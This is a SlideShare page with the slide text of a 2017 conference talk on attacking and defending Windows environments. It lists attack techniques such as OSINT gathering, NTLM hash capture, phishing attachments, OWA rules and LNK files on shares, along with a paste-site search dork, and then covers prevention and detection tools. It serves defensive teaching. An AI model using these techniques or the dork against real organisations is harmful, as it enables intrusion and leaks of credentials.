Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Attack & Detection in Windows
Environments
WHOAMI /ALL
• Chief Technical Architect – Microsoft Security
• Most Valuable Professional
• Microsoft Certified Trainer
• ...
My favorite Hollywood hack scene
My goal with this session
• Give examples on real world attacks
• Show my favorite external attacks
• NTLM hash
• Phishing...
Who is attacking?
• 2 types of attackers
@oddvarmoe
VISIBLE
ATTACKERS
INVISIBLE
ATTACKERS
Attack methodology
• Open Source Intelligence
• Homepage – metadata
• Social medias
• Password dumps
• Google dorks
• Shod...
Attackers goal
• Steal Intellectual property
• Abuse infrastructure
• Strategic goal
• Disclose
• Great example: Phineas F...
Attack kill chain
• Average 140 days
Open source intelligence
Disclaimer: Accounts used in the following
slides are just examples. Its illegal to use
this info...
@oddvarmoe
@oddvarmoe
@oddvarmoe
@oddvarmoe
@oddvarmoe
@oddvarmoe
@oddvarmoe
http://haveibeenpwned.com
Other open source intelligence resources
SHODAN.IO
Other open source intelligence resources
DNSDUMPSTER.COM
@oddvarmoe
Other open source intelligence resources
Google and pastebin
• "site:pastebin.com | site:paste2.org |
site:paste.bradleygi...
Other open source intelligence resources
SCRAPING HOMEPAGE - FOCA
@oddvarmoe
Attack demos
• Gain access:
• NTLM hash from picture
• Sending attachments
• Using OWA
• Escalate privileges:
• Scan for l...
Red Team Tool – Powershell Empire
• Shoutout to
• Will Schroeder - @harmj0y
• Justin Warner - @sixdub
• Matt Nelson - @eni...
DEMO – Gaining Access
@oddvarmoe
Preventing these attacks
• OWA – use MFA
• Attachments on mail
• Enable extra protection in GPO
• https://blogs.technet.mi...
Detecting the attacks
• Windows Defender ATP
• Windows Advanced Threat Analytics
• User Behavior
• Exchange Online ATP
• D...
DEMO – Detection
@oddvarmoe
SUMMARY
• Assume breach
• Harden your stuff
• Get detection going
• Test your security
• Educate end users
• Do regular hu...
THANKS FOR
YOUR TIME
http://oddvar.moe
Don’t be like
Trump
Give me a
green card
when you exit
NIC 2017 - Attack and detection in Windows Environments
Upcoming SlideShare
Loading in …5
×

NIC 2017 - Attack and detection in Windows Environments

362 views

Published on

Presentation I gave during NIC 2017 #NICConf.

Published in: Technology
  • Be the first to comment

NIC 2017 - Attack and detection in Windows Environments

  1. 1. Attack & Detection in Windows Environments
  2. 2. WHOAMI /ALL • Chief Technical Architect – Microsoft Security • Most Valuable Professional • Microsoft Certified Trainer • Giac Certified Penetration Tester • Microsoft infrastructure and security expert (security researcher) • 15 years+ with Microsoft technology • http://oddvar.moe • I like memes and gifs @oddvarmoe
  3. 3. My favorite Hollywood hack scene
  4. 4. My goal with this session • Give examples on real world attacks • Show my favorite external attacks • NTLM hash • Phishing mail • OWA rules • Show Internal reconnaissance • Counter measures and detection methods • Think Assume Breach! @oddvarmoe
  5. 5. Who is attacking? • 2 types of attackers @oddvarmoe VISIBLE ATTACKERS INVISIBLE ATTACKERS
  6. 6. Attack methodology • Open Source Intelligence • Homepage – metadata • Social medias • Password dumps • Google dorks • Shodan @oddvarmoe • Social engineering and Spear Phishing • Drive By Attacks • Brute force / Wordlist • Exploiting External servers • Alternate attack paths • 3.party
  7. 7. Attackers goal • Steal Intellectual property • Abuse infrastructure • Strategic goal • Disclose • Great example: Phineas Fisher -Hacking team - 2015 • http://pastebin.com/0SNSvyjJ • https://www.youtube.com/watch?v=BpyCl1Qm6Xs @oddvarmoe
  8. 8. Attack kill chain • Average 140 days
  9. 9. Open source intelligence Disclaimer: Accounts used in the following slides are just examples. Its illegal to use this information to logon. @oddvarmoe
  10. 10. @oddvarmoe
  11. 11. @oddvarmoe
  12. 12. @oddvarmoe
  13. 13. @oddvarmoe
  14. 14. @oddvarmoe
  15. 15. @oddvarmoe
  16. 16. @oddvarmoe http://haveibeenpwned.com
  17. 17. Other open source intelligence resources SHODAN.IO
  18. 18. Other open source intelligence resources DNSDUMPSTER.COM @oddvarmoe
  19. 19. Other open source intelligence resources Google and pastebin • "site:pastebin.com | site:paste2.org | site:paste.bradleygill.com | site:pastie.org | site:dpaste.com | site:paste.pocoo.org | site:pastie.textmate.org | site:slexy.org" intext:domainame.com @oddvarmoe
  20. 20. Other open source intelligence resources SCRAPING HOMEPAGE - FOCA @oddvarmoe
  21. 21. Attack demos • Gain access: • NTLM hash from picture • Sending attachments • Using OWA • Escalate privileges: • Scan for local admin rights on other machines • Place LNK on share • Look through shares • Persistence @oddvarmoe
  22. 22. Red Team Tool – Powershell Empire • Shoutout to • Will Schroeder - @harmj0y • Justin Warner - @sixdub • Matt Nelson - @enigma0x3 • www.powershellempire.com @oddvarmoe
  23. 23. DEMO – Gaining Access @oddvarmoe
  24. 24. Preventing these attacks • OWA – use MFA • Attachments on mail • Enable extra protection in GPO • https://blogs.technet.microsoft.com/mmpc/2016/03/22/new-feature-in-office- 2016-can-block-macros-and-help-prevent-infection/ • AppLocker/Device Guard • Lock down shares • Local admin • Client to client communication • Make internet great again and block 445 • Net cease https://gallery.technet.microsoft.com/Net-Cease-Blocking-Net- 1e8dcb5b • Test your security – You test your backup don’t you? @oddvarmoe
  25. 25. Detecting the attacks • Windows Defender ATP • Windows Advanced Threat Analytics • User Behavior • Exchange Online ATP • Do a hunt • Cimsweep is nice: https://github.com/PowerShellMafia/CimSweep • Tripwire or Sysmon • More logging! https://adsecurity.org/?p=3377 • IDS / IPS • SIEM / OMS @oddvarmoe
  26. 26. DEMO – Detection @oddvarmoe
  27. 27. SUMMARY • Assume breach • Harden your stuff • Get detection going • Test your security • Educate end users • Do regular hunting @oddvarmoe
  28. 28. THANKS FOR YOUR TIME http://oddvar.moe
  29. 29. Don’t be like Trump Give me a green card when you exit

×